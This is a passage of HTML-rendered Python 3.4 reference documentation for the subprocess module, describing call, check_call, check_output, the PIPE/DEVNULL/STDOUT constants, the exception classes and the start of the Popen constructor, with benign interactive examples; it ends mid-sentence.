<li><img src="../_static/py.png" alt=""
style="vertical-align: middle; margin-top: -1px"/></li>
<li><a href="https://www.python.org/">Python</a> »</li>
<li>
<span class="version_switcher_placeholder">3.4.3</span>
<a href="../index.html">Documentation</a> »
</li>
<li><a href="index.html" >The Python Standard Library</a> »</li>
<li><a href="concurrency.html" accesskey="U">17. Concurrent Execution</a> »</li>
</ul>
</div>
<div class="document">
<div class="documentwrapper">
<div class="bodywrapper">
<div class="body">
<div class="section" id="module-subprocess">
<span id="subprocess-subprocess-management"></span><h1>17.5. <a class="reference internal" href="#module-subprocess" title="subprocess: Subprocess management."><tt class="xref py py-mod docutils literal"><span class="pre">subprocess</span></tt></a> — Subprocess management<a class="headerlink" href="#module-subprocess" title="Permalink to this headline">¶</a></h1>
<p>The <a class="reference internal" href="#module-subprocess" title="subprocess: Subprocess management."><tt class="xref py py-mod docutils literal"><span class="pre">subprocess</span></tt></a> module allows you to spawn new processes, connect to their
input/output/error pipes, and obtain their return codes. This module intends to
replace several older modules and functions:</p>
<div class="highlight-python3"><div class="highlight"><pre><span class="n">os</span><span class="o">.</span><span class="n">system</span>
<span class="n">os</span><span class="o">.</span><span class="n">spawn</span><span class="o">*</span>
</pre></div>
</div>
<p>Information about how the <a class="reference internal" href="#module-subprocess" title="subprocess: Subprocess management."><tt class="xref py py-mod docutils literal"><span class="pre">subprocess</span></tt></a> module can be used to replace these
modules and functions can be found in the following sections.</p>
<div class="admonition seealso">
<p class="first admonition-title">See also</p>
<p class="last"><span class="target" id="index-0"></span><a class="pep reference external" href="http://www.python.org/dev/peps/pep-0324"><strong>PEP 324</strong></a> – PEP proposing the subprocess module</p>
</div>
<div class="section" id="using-the-subprocess-module">
<h2>17.5.1. Using the <a class="reference internal" href="#module-subprocess" title="subprocess: Subprocess management."><tt class="xref py py-mod docutils literal"><span class="pre">subprocess</span></tt></a> Module<a class="headerlink" href="#using-the-subprocess-module" title="Permalink to this headline">¶</a></h2>
<p>The recommended approach to invoking subprocesses is to use the following
convenience functions for all use cases they can handle. For more advanced
use cases, the underlying <a class="reference internal" href="#subprocess.Popen" title="subprocess.Popen"><tt class="xref py py-class docutils literal"><span class="pre">Popen</span></tt></a> interface can be used directly.</p>
<dl class="function">
<dt id="subprocess.call">
<tt class="descclassname">subprocess.</tt><tt class="descname">call</tt><big>(</big><em>args</em>, <em>*</em>, <em>stdin=None</em>, <em>stdout=None</em>, <em>stderr=None</em>, <em>shell=False</em>, <em>timeout=None</em><big>)</big><a class="headerlink" href="#subprocess.call" title="Permalink to this definition">¶</a></dt>
<dd><p>Run the command described by <em>args</em>. Wait for command to complete, then
return the <tt class="xref py py-attr docutils literal"><span class="pre">returncode</span></tt> attribute.</p>
<p>The arguments shown above are merely the most common ones, described below
in <a class="reference internal" href="#frequently-used-arguments"><em>Frequently Used Arguments</em></a> (hence the use of keyword-only notation
in the abbreviated signature). The full function signature is largely the
same as that of the <a class="reference internal" href="#subprocess.Popen" title="subprocess.Popen"><tt class="xref py py-class docutils literal"><span class="pre">Popen</span></tt></a> constructor - this function passes all
supplied arguments other than <em>timeout</em> directly through to that interface.</p>
<p>The <em>timeout</em> argument is passed to <a class="reference internal" href="#subprocess.Popen.wait" title="subprocess.Popen.wait"><tt class="xref py py-meth docutils literal"><span class="pre">Popen.wait()</span></tt></a>. If the timeout
expires, the child process will be killed and then waited for again. The
<a class="reference internal" href="#subprocess.TimeoutExpired" title="subprocess.TimeoutExpired"><tt class="xref py py-exc docutils literal"><span class="pre">TimeoutExpired</span></tt></a> exception will be re-raised after the child process
has terminated.</p>
<p>Examples:</p>
<div class="highlight-python3"><div class="highlight"><pre><span class="gp">>>> </span><span class="n">subprocess</span><span class="o">.</span><span class="n">call</span><span class="p">([</span><span class="s">"ls"</span><span class="p">,</span> <span class="s">"-l"</span><span class="p">])</span>
<span class="go">0</span>
<span class="gp">>>> </span><span class="n">subprocess</span><span class="o">.</span><span class="n">call</span><span class="p">(</span><span class="s">"exit 1"</span><span class="p">,</span> <span class="n">shell</span><span class="o">=</span><span class="k">True</span><span class="p">)</span>
<span class="go">1</span>
</pre></div>
</div>
<div class="admonition note">
<p class="first admonition-title">Note</p>
<p class="last">Do not use <tt class="docutils literal"><span class="pre">stdout=PIPE</span></tt> or <tt class="docutils literal"><span class="pre">stderr=PIPE</span></tt> with this
function. The child process will block if it generates enough
output to a pipe to fill up the OS pipe buffer as the pipes are
not being read from.</p>
</div>
<div class="versionchanged">
<p><span class="versionmodified">Changed in version 3.3: </span><em>timeout</em> was added.</p>
</div>
</dd></dl>
<dl class="function">
<dt id="subprocess.check_call">
<tt class="descclassname">subprocess.</tt><tt class="descname">check_call</tt><big>(</big><em>args</em>, <em>*</em>, <em>stdin=None</em>, <em>stdout=None</em>, <em>stderr=None</em>, <em>shell=False</em>, <em>timeout=None</em><big>)</big><a class="headerlink" href="#subprocess.check_call" title="Permalink to this definition">¶</a></dt>
<dd><p>Run command with arguments. Wait for command to complete. If the return
code was zero then return, otherwise raise <a class="reference internal" href="#subprocess.CalledProcessError" title="subprocess.CalledProcessError"><tt class="xref py py-exc docutils literal"><span class="pre">CalledProcessError</span></tt></a>. The
<a class="reference internal" href="#subprocess.CalledProcessError" title="subprocess.CalledProcessError"><tt class="xref py py-exc docutils literal"><span class="pre">CalledProcessError</span></tt></a> object will have the return code in the
<a class="reference internal" href="#subprocess.CalledProcessError.returncode" title="subprocess.CalledProcessError.returncode"><tt class="xref py py-attr docutils literal"><span class="pre">returncode</span></tt></a> attribute.</p>
<p>The arguments shown above are merely the most common ones, described below
in <a class="reference internal" href="#frequently-used-arguments"><em>Frequently Used Arguments</em></a> (hence the use of keyword-only notation
in the abbreviated signature). The full function signature is largely the
same as that of the <a class="reference internal" href="#subprocess.Popen" title="subprocess.Popen"><tt class="xref py py-class docutils literal"><span class="pre">Popen</span></tt></a> constructor - this function passes all
supplied arguments other than <em>timeout</em> directly through to that interface.</p>
<p>The <em>timeout</em> argument is passed to <a class="reference internal" href="#subprocess.Popen.wait" title="subprocess.Popen.wait"><tt class="xref py py-meth docutils literal"><span class="pre">Popen.wait()</span></tt></a>. If the timeout
expires, the child process will be killed and then waited for again. The
<a class="reference internal" href="#subprocess.TimeoutExpired" title="subprocess.TimeoutExpired"><tt class="xref py py-exc docutils literal"><span class="pre">TimeoutExpired</span></tt></a> exception will be re-raised after the child process
has terminated.</p>
<p>Examples:</p>
<div class="highlight-python3"><div class="highlight"><pre><span class="gp">>>> </span><span class="n">subprocess</span><span class="o">.</span><span class="n">check_call</span><span class="p">([</span><span class="s">"ls"</span><span class="p">,</span> <span class="s">"-l"</span><span class="p">])</span>
<span class="go">0</span>
<span class="gp">>>> </span><span class="n">subprocess</span><span class="o">.</span><span class="n">check_call</span><span class="p">(</span><span class="s">"exit 1"</span><span class="p">,</span> <span class="n">shell</span><span class="o">=</span><span class="k">True</span><span class="p">)</span>
<span class="gt">Traceback (most recent call last):</span>
<span class="c">...</span>
<span class="gr">subprocess.CalledProcessError</span>: <span class="n">Command 'exit 1' returned non-zero exit status 1</span>
</pre></div>
</div>
<div class="admonition note">
<p class="first admonition-title">Note</p>
<p class="last">Do not use <tt class="docutils literal"><span class="pre">stdout=PIPE</span></tt> or <tt class="docutils literal"><span class="pre">stderr=PIPE</span></tt> with this
function. The child process will block if it generates enough
output to a pipe to fill up the OS pipe buffer as the pipes are
not being read from.</p>
</div>
<div class="versionchanged">
<p><span class="versionmodified">Changed in version 3.3: </span><em>timeout</em> was added.</p>
</div>
</dd></dl>
<dl class="function">
<dt id="subprocess.check_output">
<tt class="descclassname">subprocess.</tt><tt class="descname">check_output</tt><big>(</big><em>args</em>, <em>*</em>, <em>input=None</em>, <em>stdin=None</em>, <em>stderr=None</em>, <em>shell=False</em>, <em>universal_newlines=False</em>, <em>timeout=None</em><big>)</big><a class="headerlink" href="#subprocess.check_output" title="Permalink to this definition">¶</a></dt>
<dd><p>Run command with arguments and return its output.</p>
<p>If the return code was non-zero it raises a <a class="reference internal" href="#subprocess.CalledProcessError" title="subprocess.CalledProcessError"><tt class="xref py py-exc docutils literal"><span class="pre">CalledProcessError</span></tt></a>. The
<a class="reference internal" href="#subprocess.CalledProcessError" title="subprocess.CalledProcessError"><tt class="xref py py-exc docutils literal"><span class="pre">CalledProcessError</span></tt></a> object will have the return code in the
<a class="reference internal" href="#subprocess.CalledProcessError.returncode" title="subprocess.CalledProcessError.returncode"><tt class="xref py py-attr docutils literal"><span class="pre">returncode</span></tt></a> attribute and any output in the
<a class="reference internal" href="#subprocess.CalledProcessError.output" title="subprocess.CalledProcessError.output"><tt class="xref py py-attr docutils literal"><span class="pre">output</span></tt></a> attribute.</p>
<p>The arguments shown above are merely the most common ones, described below
in <a class="reference internal" href="#frequently-used-arguments"><em>Frequently Used Arguments</em></a> (hence the use of keyword-only notation
in the abbreviated signature). The full function signature is largely the
same as that of the <a class="reference internal" href="#subprocess.Popen" title="subprocess.Popen"><tt class="xref py py-class docutils literal"><span class="pre">Popen</span></tt></a> constructor - this functions passes all
supplied arguments other than <em>input</em> and <em>timeout</em> directly through to
that interface. In addition, <em>stdout</em> is not permitted as an argument, as
it is used internally to collect the output from the subprocess.</p>
<p>The <em>timeout</em> argument is passed to <a class="reference internal" href="#subprocess.Popen.wait" title="subprocess.Popen.wait"><tt class="xref py py-meth docutils literal"><span class="pre">Popen.wait()</span></tt></a>. If the timeout
expires, the child process will be killed and then waited for again. The
<a class="reference internal" href="#subprocess.TimeoutExpired" title="subprocess.TimeoutExpired"><tt class="xref py py-exc docutils literal"><span class="pre">TimeoutExpired</span></tt></a> exception will be re-raised after the child process
has terminated.</p>
<p>The <em>input</em> argument is passed to <a class="reference internal" href="#subprocess.Popen.communicate" title="subprocess.Popen.communicate"><tt class="xref py py-meth docutils literal"><span class="pre">Popen.communicate()</span></tt></a> and thus to the
subprocess’s stdin. If used it must be a byte sequence, or a string if
<tt class="docutils literal"><span class="pre">universal_newlines=True</span></tt>. When used, the internal <a class="reference internal" href="#subprocess.Popen" title="subprocess.Popen"><tt class="xref py py-class docutils literal"><span class="pre">Popen</span></tt></a> object
is automatically created with <tt class="docutils literal"><span class="pre">stdin=PIPE</span></tt>, and the <em>stdin</em> argument may
not be used as well.</p>
<p>Examples:</p>
<div class="highlight-python3"><div class="highlight"><pre><span class="gp">>>> </span><span class="n">subprocess</span><span class="o">.</span><span class="n">check_output</span><span class="p">([</span><span class="s">"echo"</span><span class="p">,</span> <span class="s">"Hello World!"</span><span class="p">])</span>
<span class="go">b'Hello World!\n'</span>
<span class="gp">>>> </span><span class="n">subprocess</span><span class="o">.</span><span class="n">check_output</span><span class="p">([</span><span class="s">"echo"</span><span class="p">,</span> <span class="s">"Hello World!"</span><span class="p">],</span> <span class="n">universal_newlines</span><span class="o">=</span><span class="k">True</span><span class="p">)</span>
<span class="go">'Hello World!\n'</span>
<span class="gp">>>> </span><span class="n">subprocess</span><span class="o">.</span><span class="n">check_output</span><span class="p">([</span><span class="s">"sed"</span><span class="p">,</span> <span class="s">"-e"</span><span class="p">,</span> <span class="s">"s/foo/bar/"</span><span class="p">],</span>
<span class="gp">... </span> <span class="nb">input</span><span class="o">=</span><span class="n">b</span><span class="s">"when in the course of fooman events</span><span class="se">\n</span><span class="s">"</span><span class="p">)</span>
<span class="go">b'when in the course of barman events\n'</span>
<span class="gp">>>> </span><span class="n">subprocess</span><span class="o">.</span><span class="n">check_output</span><span class="p">(</span><span class="s">"exit 1"</span><span class="p">,</span> <span class="n">shell</span><span class="o">=</span><span class="k">True</span><span class="p">)</span>
<span class="gt">Traceback (most recent call last):</span>
<span class="c">...</span>
<span class="gr">subprocess.CalledProcessError</span>: <span class="n">Command 'exit 1' returned non-zero exit status 1</span>
</pre></div>
</div>
<p>By default, this function will return the data as encoded bytes. The actual
encoding of the output data may depend on the command being invoked, so the
decoding to text will often need to be handled at the application level.</p>
<p>This behaviour may be overridden by setting <em>universal_newlines</em> to
<tt class="docutils literal"><span class="pre">True</span></tt> as described below in <a class="reference internal" href="#frequently-used-arguments"><em>Frequently Used Arguments</em></a>.</p>
<p>To also capture standard error in the result, use
<tt class="docutils literal"><span class="pre">stderr=subprocess.STDOUT</span></tt>:</p>
<div class="highlight-python3"><div class="highlight"><pre><span class="gp">>>> </span><span class="n">subprocess</span><span class="o">.</span><span class="n">check_output</span><span class="p">(</span>
<span class="gp">... </span> <span class="s">"ls non_existent_file; exit 0"</span><span class="p">,</span>
<span class="gp">... </span> <span class="n">stderr</span><span class="o">=</span><span class="n">subprocess</span><span class="o">.</span><span class="n">STDOUT</span><span class="p">,</span>
<span class="gp">... </span> <span class="n">shell</span><span class="o">=</span><span class="k">True</span><span class="p">)</span>
<span class="go">'ls: non_existent_file: No such file or directory\n'</span>
</pre></div>
</div>
<div class="admonition note">
<p class="first admonition-title">Note</p>
<p class="last">Do not use <tt class="docutils literal"><span class="pre">stdout=PIPE</span></tt> or <tt class="docutils literal"><span class="pre">stderr=PIPE</span></tt> with this
function. The child process will block if it generates enough
output to a pipe to fill up the OS pipe buffer as the pipes are
not being read from.</p>
</div>
<div class="versionadded">
<p><span class="versionmodified">New in version 3.1.</span></p>
</div>
<div class="versionchanged">
<p><span class="versionmodified">Changed in version 3.3: </span><em>timeout</em> was added.</p>
</div>
<div class="versionchanged">
<p><span class="versionmodified">Changed in version 3.4: </span><em>input</em> was added.</p>
</div>
</dd></dl>
<dl class="data">
<dt id="subprocess.DEVNULL">
<tt class="descclassname">subprocess.</tt><tt class="descname">DEVNULL</tt><a class="headerlink" href="#subprocess.DEVNULL" title="Permalink to this definition">¶</a></dt>
<dd><p>Special value that can be used as the <em>stdin</em>, <em>stdout</em> or <em>stderr</em> argument
to <a class="reference internal" href="#subprocess.Popen" title="subprocess.Popen"><tt class="xref py py-class docutils literal"><span class="pre">Popen</span></tt></a> and indicates that the special file <a class="reference internal" href="os.html#os.devnull" title="os.devnull"><tt class="xref py py-data docutils literal"><span class="pre">os.devnull</span></tt></a>
will be used.</p>
<div class="versionadded">
<p><span class="versionmodified">New in version 3.3.</span></p>
</div>
</dd></dl>
<dl class="data">
<dt id="subprocess.PIPE">
<tt class="descclassname">subprocess.</tt><tt class="descname">PIPE</tt><a class="headerlink" href="#subprocess.PIPE" title="Permalink to this definition">¶</a></dt>
<dd><p>Special value that can be used as the <em>stdin</em>, <em>stdout</em> or <em>stderr</em> argument
to <a class="reference internal" href="#subprocess.Popen" title="subprocess.Popen"><tt class="xref py py-class docutils literal"><span class="pre">Popen</span></tt></a> and indicates that a pipe to the standard stream should be
opened. Most useful with <a class="reference internal" href="#subprocess.Popen.communicate" title="subprocess.Popen.communicate"><tt class="xref py py-meth docutils literal"><span class="pre">Popen.communicate()</span></tt></a>.</p>
</dd></dl>
<dl class="data">
<dt id="subprocess.STDOUT">
<tt class="descclassname">subprocess.</tt><tt class="descname">STDOUT</tt><a class="headerlink" href="#subprocess.STDOUT" title="Permalink to this definition">¶</a></dt>
<dd><p>Special value that can be used as the <em>stderr</em> argument to <a class="reference internal" href="#subprocess.Popen" title="subprocess.Popen"><tt class="xref py py-class docutils literal"><span class="pre">Popen</span></tt></a> and
indicates that standard error should go into the same handle as standard
output.</p>
</dd></dl>
<dl class="exception">
<dt id="subprocess.SubprocessError">
<em class="property">exception </em><tt class="descclassname">subprocess.</tt><tt class="descname">SubprocessError</tt><a class="headerlink" href="#subprocess.SubprocessError" title="Permalink to this definition">¶</a></dt>
<dd><p>Base class for all other exceptions from this module.</p>
<div class="versionadded">
<p><span class="versionmodified">New in version 3.3.</span></p>
</div>
</dd></dl>
<dl class="exception">
<dt id="subprocess.TimeoutExpired">
<em class="property">exception </em><tt class="descclassname">subprocess.</tt><tt class="descname">TimeoutExpired</tt><a class="headerlink" href="#subprocess.TimeoutExpired" title="Permalink to this definition">¶</a></dt>
<dd><p>Subclass of <a class="reference internal" href="#subprocess.SubprocessError" title="subprocess.SubprocessError"><tt class="xref py py-exc docutils literal"><span class="pre">SubprocessError</span></tt></a>, raised when a timeout expires
while waiting for a child process.</p>
<dl class="attribute">
<dt id="subprocess.TimeoutExpired.cmd">
<tt class="descname">cmd</tt><a class="headerlink" href="#subprocess.TimeoutExpired.cmd" title="Permalink to this definition">¶</a></dt>
<dd><p>Command that was used to spawn the child process.</p>
</dd></dl>
<dl class="attribute">
<dt id="subprocess.TimeoutExpired.timeout">
<tt class="descname">timeout</tt><a class="headerlink" href="#subprocess.TimeoutExpired.timeout" title="Permalink to this definition">¶</a></dt>
<dd><p>Timeout in seconds.</p>
</dd></dl>
<dl class="attribute">
<dt id="subprocess.TimeoutExpired.output">
<tt class="descname">output</tt><a class="headerlink" href="#subprocess.TimeoutExpired.output" title="Permalink to this definition">¶</a></dt>
<dd><p>Output of the child process if this exception is raised by
<a class="reference internal" href="#subprocess.check_output" title="subprocess.check_output"><tt class="xref py py-func docutils literal"><span class="pre">check_output()</span></tt></a>. Otherwise, <tt class="docutils literal"><span class="pre">None</span></tt>.</p>
</dd></dl>
<div class="versionadded">
<p><span class="versionmodified">New in version 3.3.</span></p>
</div>
</dd></dl>
<dl class="exception">
<dt id="subprocess.CalledProcessError">
<em class="property">exception </em><tt class="descclassname">subprocess.</tt><tt class="descname">CalledProcessError</tt><a class="headerlink" href="#subprocess.CalledProcessError" title="Permalink to this definition">¶</a></dt>
<dd><p>Subclass of <a class="reference internal" href="#subprocess.SubprocessError" title="subprocess.SubprocessError"><tt class="xref py py-exc docutils literal"><span class="pre">SubprocessError</span></tt></a>, raised when a process run by
<a class="reference internal" href="#subprocess.check_call" title="subprocess.check_call"><tt class="xref py py-func docutils literal"><span class="pre">check_call()</span></tt></a> or <a class="reference internal" href="#subprocess.check_output" title="subprocess.check_output"><tt class="xref py py-func docutils literal"><span class="pre">check_output()</span></tt></a> returns a non-zero exit status.</p>
<dl class="attribute">
<dt id="subprocess.CalledProcessError.returncode">
<tt class="descname">returncode</tt><a class="headerlink" href="#subprocess.CalledProcessError.returncode" title="Permalink to this definition">¶</a></dt>
<dd><p>Exit status of the child process.</p>
</dd></dl>
<dl class="attribute">
<dt id="subprocess.CalledProcessError.cmd">
<tt class="descname">cmd</tt><a class="headerlink" href="#subprocess.CalledProcessError.cmd" title="Permalink to this definition">¶</a></dt>
<dd><p>Command that was used to spawn the child process.</p>
</dd></dl>
<dl class="attribute">
<dt id="subprocess.CalledProcessError.output">
<tt class="descname">output</tt><a class="headerlink" href="#subprocess.CalledProcessError.output" title="Permalink to this definition">¶</a></dt>
<dd><p>Output of the child process if this exception is raised by
<a class="reference internal" href="#subprocess.check_output" title="subprocess.check_output"><tt class="xref py py-func docutils literal"><span class="pre">check_output()</span></tt></a>. Otherwise, <tt class="docutils literal"><span class="pre">None</span></tt>.</p>
</dd></dl>
</dd></dl>
<div class="section" id="frequently-used-arguments">
<span id="id1"></span><h3>17.5.1.1. Frequently Used Arguments<a class="headerlink" href="#frequently-used-arguments" title="Permalink to this headline">¶</a></h3>
<p>To support a wide variety of use cases, the <a class="reference internal" href="#subprocess.Popen" title="subprocess.Popen"><tt class="xref py py-class docutils literal"><span class="pre">Popen</span></tt></a> constructor (and
the convenience functions) accept a large number of optional arguments. For
most typical use cases, many of these arguments can be safely left at their
default values. The arguments that are most commonly needed are:</p>
<blockquote>
<div><p><em>args</em> is required for all calls and should be a string, or a sequence of
program arguments. Providing a sequence of arguments is generally
preferred, as it allows the module to take care of any required escaping
and quoting of arguments (e.g. to permit spaces in file names). If passing
a single string, either <em>shell</em> must be <a class="reference internal" href="constants.html#True" title="True"><tt class="xref py py-const docutils literal"><span class="pre">True</span></tt></a> (see below) or else
the string must simply name the program to be executed without specifying
any arguments.</p>
<p><em>stdin</em>, <em>stdout</em> and <em>stderr</em> specify the executed program’s standard input,
standard output and standard error file handles, respectively. Valid values
are <a class="reference internal" href="#subprocess.PIPE" title="subprocess.PIPE"><tt class="xref py py-data docutils literal"><span class="pre">PIPE</span></tt></a>, <a class="reference internal" href="#subprocess.DEVNULL" title="subprocess.DEVNULL"><tt class="xref py py-data docutils literal"><span class="pre">DEVNULL</span></tt></a>, an existing file descriptor (a positive
integer), an existing file object, and <tt class="docutils literal"><span class="pre">None</span></tt>. <a class="reference internal" href="#subprocess.PIPE" title="subprocess.PIPE"><tt class="xref py py-data docutils literal"><span class="pre">PIPE</span></tt></a> indicates
that a new pipe to the child should be created. <a class="reference internal" href="#subprocess.DEVNULL" title="subprocess.DEVNULL"><tt class="xref py py-data docutils literal"><span class="pre">DEVNULL</span></tt></a> indicates
that the special file <a class="reference internal" href="os.html#os.devnull" title="os.devnull"><tt class="xref py py-data docutils literal"><span class="pre">os.devnull</span></tt></a> will be used. With the default
settings of <tt class="docutils literal"><span class="pre">None</span></tt>, no redirection will occur; the child’s file handles
will be inherited from the parent. Additionally, <em>stderr</em> can be
<a class="reference internal" href="#subprocess.STDOUT" title="subprocess.STDOUT"><tt class="xref py py-data docutils literal"><span class="pre">STDOUT</span></tt></a>, which indicates that the stderr data from the child
process should be captured into the same file handle as for <em>stdout</em>.</p>
<p id="index-1">If <em>universal_newlines</em> is <tt class="docutils literal"><span class="pre">False</span></tt> the file objects <em>stdin</em>, <em>stdout</em> and
<em>stderr</em> will be opened as binary streams, and no line ending conversion is
done.</p>
<p>If <em>universal_newlines</em> is <tt class="docutils literal"><span class="pre">True</span></tt>, these file objects
will be opened as text streams in <a class="reference internal" href="../glossary.html#term-universal-newlines"><em class="xref std std-term">universal newlines</em></a> mode
using the encoding returned by <a class="reference internal" href="locale.html#locale.getpreferredencoding" title="locale.getpreferredencoding"><tt class="xref py py-func docutils literal"><span class="pre">locale.getpreferredencoding(False)</span></tt></a>. For <em>stdin</em>, line ending characters
<tt class="docutils literal"><span class="pre">'\n'</span></tt> in the input will be converted to the default line separator
<a class="reference internal" href="os.html#os.linesep" title="os.linesep"><tt class="xref py py-data docutils literal"><span class="pre">os.linesep</span></tt></a>. For <em>stdout</em> and <em>stderr</em>, all line endings in the
output will be converted to <tt class="docutils literal"><span class="pre">'\n'</span></tt>. For more information see the
documentation of the <a class="reference internal" href="io.html#io.TextIOWrapper" title="io.TextIOWrapper"><tt class="xref py py-class docutils literal"><span class="pre">io.TextIOWrapper</span></tt></a> class when the <em>newline</em>
argument to its constructor is <tt class="docutils literal"><span class="pre">None</span></tt>.</p>
<div class="admonition note">
<p class="first admonition-title">Note</p>
<p class="last">The newlines attribute of the file objects <a class="reference internal" href="#subprocess.Popen.stdin" title="subprocess.Popen.stdin"><tt class="xref py py-attr docutils literal"><span class="pre">Popen.stdin</span></tt></a>,
<a class="reference internal" href="#subprocess.Popen.stdout" title="subprocess.Popen.stdout"><tt class="xref py py-attr docutils literal"><span class="pre">Popen.stdout</span></tt></a> and <a class="reference internal" href="#subprocess.Popen.stderr" title="subprocess.Popen.stderr"><tt class="xref py py-attr docutils literal"><span class="pre">Popen.stderr</span></tt></a> are not updated by
the <a class="reference internal" href="#subprocess.Popen.communicate" title="subprocess.Popen.communicate"><tt class="xref py py-meth docutils literal"><span class="pre">Popen.communicate()</span></tt></a> method.</p>
</div>
<p>If <em>shell</em> is <tt class="docutils literal"><span class="pre">True</span></tt>, the specified command will be executed through
the shell. This can be useful if you are using Python primarily for the
enhanced control flow it offers over most system shells and still want
convenient access to other shell features such as shell pipes, filename
wildcards, environment variable expansion, and expansion of <tt class="docutils literal"><span class="pre">~</span></tt> to a
user’s home directory. However, note that Python itself offers
implementations of many shell-like features (in particular, <a class="reference internal" href="glob.html#module-glob" title="glob: Unix shell style pathname pattern expansion."><tt class="xref py py-mod docutils literal"><span class="pre">glob</span></tt></a>,
<a class="reference internal" href="fnmatch.html#module-fnmatch" title="fnmatch: Unix shell style filename pattern matching."><tt class="xref py py-mod docutils literal"><span class="pre">fnmatch</span></tt></a>, <a class="reference internal" href="os.html#os.walk" title="os.walk"><tt class="xref py py-func docutils literal"><span class="pre">os.walk()</span></tt></a>, <a class="reference internal" href="os.path.html#os.path.expandvars" title="os.path.expandvars"><tt class="xref py py-func docutils literal"><span class="pre">os.path.expandvars()</span></tt></a>,
<a class="reference internal" href="os.path.html#os.path.expanduser" title="os.path.expanduser"><tt class="xref py py-func docutils literal"><span class="pre">os.path.expanduser()</span></tt></a>, and <a class="reference internal" href="shutil.html#module-shutil" title="shutil: High-level file operations, including copying."><tt class="xref py py-mod docutils literal"><span class="pre">shutil</span></tt></a>).</p>
<div class="versionchanged">
<p><span class="versionmodified">Changed in version 3.3: </span>When <em>universal_newlines</em> is <tt class="docutils literal"><span class="pre">True</span></tt>, the class uses the encoding
<a class="reference internal" href="locale.html#locale.getpreferredencoding" title="locale.getpreferredencoding"><tt class="xref py py-func docutils literal"><span class="pre">locale.getpreferredencoding(False)</span></tt></a>
instead of <tt class="docutils literal"><span class="pre">locale.getpreferredencoding()</span></tt>. See the
<a class="reference internal" href="io.html#io.TextIOWrapper" title="io.TextIOWrapper"><tt class="xref py py-class docutils literal"><span class="pre">io.TextIOWrapper</span></tt></a> class for more information on this change.</p>
</div>
<div class="admonition note">
<p class="first admonition-title">Note</p>
<p class="last">Read the <a class="reference internal" href="#security-considerations">Security Considerations</a> section before using <tt class="docutils literal"><span class="pre">shell=True</span></tt>.</p>
</div>
</div></blockquote>
<p>These options, along with all of the other options, are described in more
detail in the <a class="reference internal" href="#subprocess.Popen" title="subprocess.Popen"><tt class="xref py py-class docutils literal"><span class="pre">Popen</span></tt></a> constructor documentation.</p>
</div>
<div class="section" id="popen-constructor">
<h3>17.5.1.2. Popen Constructor<a class="headerlink" href="#popen-constructor" title="Permalink to this headline">¶</a></h3>
<p>The underlying process creation and management in this module is handled by
the <a class="reference internal" href="#subprocess.Popen" title="subprocess.Popen"><tt class="xref py py-class docutils literal"><span class="pre">Popen</span></tt></a> class. It offers a lot of flexibility so that developers
are able to handle the less common cases not covered by the convenience
functions.</p>
<dl class="class">
<dt id="subprocess.Popen">
<em class="property">class </em><tt class="descclassname">subprocess.</tt><tt class="descname">Popen</tt><big>(</big><em>args</em>, <em>bufsize=-1</em>, <em>executable=None</em>, <em>stdin=None</em>, <em>stdout=None</em>, <em>stderr=None</em>, <em>preexec_fn=None</em>, <em>close_fds=True</em>, <em>shell=False</em>, <em>cwd=None</em>, <em>env=None</em>, <em>universal_newlines=False</em>, <em>startupinfo=None</em>, <em>creationflags=0</em>, <em>restore_signals=True</em>, <em>start_new_session=False</em>, <em>pass_fds=()</em><big>)</big><a class="headerlink" href="#subprocess.Popen" title="Permalink to this definition">¶</a></dt>
<dd><p>Execute a child program in a new process. On POSIX, the class uses
<a class="reference internal" href="os.html#os.execvp" title="os.execvp"><tt class="xref py py-meth docutils literal"><span class="pre">os.execvp()</span></tt></a>-like behavior to execute the child program. On Windows,
the class uses the Windows <tt class="docutils literal"><span class="pre">CreateProcess()</span></tt> function. The arguments to
<a class="reference internal" href="#subprocess.Popen" title="subprocess.Popen"><tt class="xref py py-class docutils literal"><span class="pre">Popen</span></tt></a> are as follows.</p>
<p><em>args</em> should be a sequence of program arguments or else a single string.
By default, the program to execute is the first item in <em>args</em> if <em>args</em> is
a sequence. If <em>args</em> is a string, the interpretation is
platform-dependent and described below. See the <em>shell</em> and <em>executable</em>
arguments for additional differences from the default behavior. Unless
otherwise stated, it is recommended to pass <em>args</em> as a sequence.</p>
<p>On POSIX, if <em>args</em> is a string, the string is interpreted as the name or
path of the program to execute. However, this can only be done if not
passing arguments to the program.</p>
<div class="admonition note">
<p class="first admonition-title">Note</p>
<p><a class="reference internal" href="shlex.html#shlex.split" title="shlex.split"><tt class="xref py py-meth docutils literal"><span class="pre">shlex.split()</span></tt></a> can be useful when determining the correct
tokenization for <em>args</em>, especially in complex cases:</p>
<div class="highlight-python3"><div class="highlight"><pre><span class="gp">>>> </span><span class="kn">import</span> <span class="nn">shlex</span><span class="o">,</span> <span class="nn">subprocess</span>
<span class="gp">>>> </span><span class="n">command_line</span> <span class="o">=</span> <span class="nb">input</span><span class="p">()</span>
<span class="go">/bin/vikings -input eggs.txt -output "spam spam.txt" -cmd "echo '$MONEY'"</span>
<span class="gp">>>> </span><span class="n">args</span> <span class="o">=</span> <span class="n">shlex</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="n">command_line</span><span class="p">)</span>
<span class="gp">>>> </span><span class="nb">print</span><span class="p">(</span><span class="n">args</span><span class="p">)</span>
<span class="go">['/bin/vikings', '-input', 'eggs.txt', '-output', 'spam spam.txt', '-cmd', "echo '$MONEY'"]</span>
<span class="gp">>>> </span><span class="n">p</span> <span class="o">=</span> <span class="n">subprocess</span><span class="o">.</span><span class="n">Popen</span><span class="p">(</span><span class="n">args</span><span class="p">)</span> <span class="c"># Success!</span>
</pre></div>
</div>
<p class="last">Note in particular that options (such as <em>-input</em>) and arguments (such
as <em>eggs.txt</em>) that are separated by whitespace in the shell go in separate
list elements, while arguments that need quoting or backslash escaping when
used in the shell (such as filenames containing spaces or the <em>echo</em> command
shown above) are single list elements.</p>
</div>
<p>On Windows, if <em>args</em> is a sequence, it will be converted to a string in a
manner described in <a class="reference internal" href="#converting-argument-sequence"><em>Converting an argument sequence to a string on Windows</em></a>. This is because
the underlying <tt class="docutils literal"><span class="pre">CreateProcess()</span></tt> operates on strings.</p>
<p>The <em>shell</em> argument (which defaults to <em>False</em>) specifies whether to use
the shell as the program to execute. If <em>shell</em> is <em>True</em>, it is
recommended to pass <em>args</em> as a string rather than as a sequence.</p>
<p>On POSIX with <tt class="docutils literal"><span class="pre">shell=True</span></tt>, the shell defaults to <tt class="file docutils literal"><span class="pre">/bin/sh</span></tt>. If
<em>args</em> is a string, the string specifies the command
to execute through the shell. This means that the string must be
formatted exactly as it would be when typed at the shell prompt. This
